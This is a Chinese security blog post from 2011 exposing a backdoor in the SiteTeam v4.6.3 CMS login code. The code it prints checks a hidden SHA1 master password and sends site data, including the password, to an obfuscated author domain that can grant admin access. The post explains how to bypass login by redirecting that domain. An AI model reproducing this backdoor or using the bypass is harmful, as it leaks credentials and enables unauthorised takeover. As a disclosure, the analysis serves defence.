作者:心灵
SiteTeam 企业自助建站源码版 v4.6.3 0day,从一个0DAY看出社会的黑暗!不是每个表面光鲜的白领人士,做事都是光明的。
不是每个表面光鲜的白领人士,做事都是光明的,看完下面分析,就知道什么叫小人!
程序名称:SiteTeam 企业自助建站源码版 v4.6.3,经典对白,看代码。
|
admin.php:
if (!empty($_POST['dosubmit']) && !empty($_POST['password'])) { //提交登录密码
if ($_POST['password'] == $domain[$site_url]['password']) //这个程序不使用MYSQL 密码保存在CONFIG里
{ ob_start(); @session_start();
$_SESSION['loginid'] = true; //密码正确就登录成功
} elseif(check_admin($_POST['password'])) //下面的自定义变量从global.inc.php里复制来 方便看
// function check_admin($string)
//{ $t1 = "091d37a2";
// $t2 = "562a636e";
// $t3 = "74fed832";
// $t4 = "038ea911";
// $t5 = "c7269974"; if (sha1($string) === "{$t3}{$t5}{$t1}{$t4}{$t2}")
// { return true; } else { return false; } }
//这个密码是什么估计只有作者才知道 我就没试过去跑SHA1了
{ if (ALLOW_URL_FOPEN) { $site_info = $domain[$site_url];
$date_url = "http://www.";
$date_url .= site_server_url(); //下面的自定义变量从global.inc.php里复制来 方便看
// function site_server_url()
//{ $number_str = '99,104,101,110,';
//$number_str .= '104,117,99,104,101,';
// $number_str .= '110,103,46,99,111,109';
// $number_str = explode(',', $number_str);
// $temp = '';
// foreach ($number_str as $c)
// { $temp .= chr ($c);
// } return
// $temp;
// }
//解密后 就是 chenhucheng.com 作者的BLOG 陈虎城
if (function_exists('http_build_query'))
{ $date_url .= "/soft/admin.php?" . http_build_query($site_info);
} else
{ $date_url .= "/soft/admin.php?phpv=4&data=" . base64_encode(serialize($site_info));
} if ($code = @file_get_contents($date_url)) { //他的admin.php什么代码我就不知道了
if (intval($code) == 8) //如果服务端返回8则成功登录后台!
{ ob_start()
; @session_start();
$_SESSION['loginid'] = true;
$_SESSION['SITETEAM_ADMIN'] = true;
} } } else { ob_start(); @session_start();
@session_destroy();
ob_end_flush();
go_url("admin.php?action=login", "密码不正确"); |
0DAY 利用方法,修改服务器 HOST 表,把 www.chenhucheng.com 改为 127.0.0.1。
建一个 soft 文件,里面放一个 admin.php,内容就一个字 8 既可。
-0-!都能修改 HOST 了,还用这样?.....
所以利用方法就是,修改服务器机房路由改变DNS解析地址...... -0-!.......
要是某牛人跑出SHA密码并劫持作者域名.......
这就是所谓的中国特色!
文章作者
Nuclear'Atk
上次更新
2011-03-04
许可协议
Nuclear'Atk(核攻击)网络安全实验室版权所有,转载请注明出处。